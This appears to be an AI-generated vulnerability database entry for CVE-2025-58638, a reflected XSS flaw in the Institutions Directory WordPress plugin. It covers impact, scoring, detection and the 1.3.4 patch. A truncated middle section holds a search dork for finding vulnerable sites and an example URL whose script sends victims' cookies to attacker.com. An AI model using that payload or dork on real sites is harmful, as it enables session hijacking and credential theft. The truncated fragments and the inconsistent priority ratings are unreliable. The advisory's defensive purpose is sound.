
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-58638 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Institutions Directory WordPress plugin by e-plugins, classified under CWE-79. It affects all versions up to and including 1.3.3, with version 1.3.4 being the patched release. The vulnerability was reported on July 31, 2025, by researcher João Pedro S Alcântara (Kinorth) and published by Patchstack on August 30, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), allowing attacker-controlled data to be reflected back in the HTTP response without adequate sanitization or encoding. As a Reflected XSS vulnerability, exploitation requires an attacker to craft a malicious URL containing a JavaScript payload and trick an authenticated or privileged user into clicking it; the payload is then executed in the victim's browser within the context of the WordPress site. The attack vector is network-based, requires no privileges from the attacker, but does require user interaction to succeed (Patchstack).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site, potentially leading to session hijacking, credential theft, unauthorized administrative actions, or injection of malicious redirects and advertisements. The scope is changed (S:C), meaning the impact extends beyond the vulnerable component to the user's browser environment. Confidentiality, integrity, and availability are each assessed as low impact individually, but combined with the changed scope, the overall risk is rated medium-to-high (Patchstack).
No public proof-of-concept exploit code or active in-the-wild exploitation has been confirmed at this time. The EPSS score is approximately 0.038%, indicating a low but non-negligible probability of exploitation in the near term. Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting thousands of WordPress sites regardless of traffic or popularity. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Patchstack).
inurl:wp-content/plugins/institutions-directory).https://target-site.com/?institutions_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<script>, javascript:, onerror=, onload=) in query parameters; outbound requests from victim browsers to unknown external domains shortly after page load.%3Cscript%3E, %22, %27) in parameters associated with the institutions-directory plugin endpoints.wp-content/plugins/institutions-directory/ that may indicate post-exploitation tampering.The vendor has released version 1.3.4 of the Institutions Directory plugin, which resolves this vulnerability. Site administrators should update immediately via the WordPress plugin dashboard or by downloading the patched version from the WordPress plugin repository. Patchstack users benefit from an automatically deployed virtual patch (mitigation rule) that blocks exploitation attempts until the plugin is updated. If an immediate update is not possible, consider temporarily deactivating the plugin or restricting access to affected pages (Patchstack).
Patchstack, which coordinated the disclosure, classified this as a medium-priority vulnerability and issued a virtual patch for its users. The vulnerability was credited to researcher João Pedro S Alcântara (Kinorth), who reported it through Patchstack's VDP program. No significant broader media coverage or notable social media discussion has been identified for this CVE (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."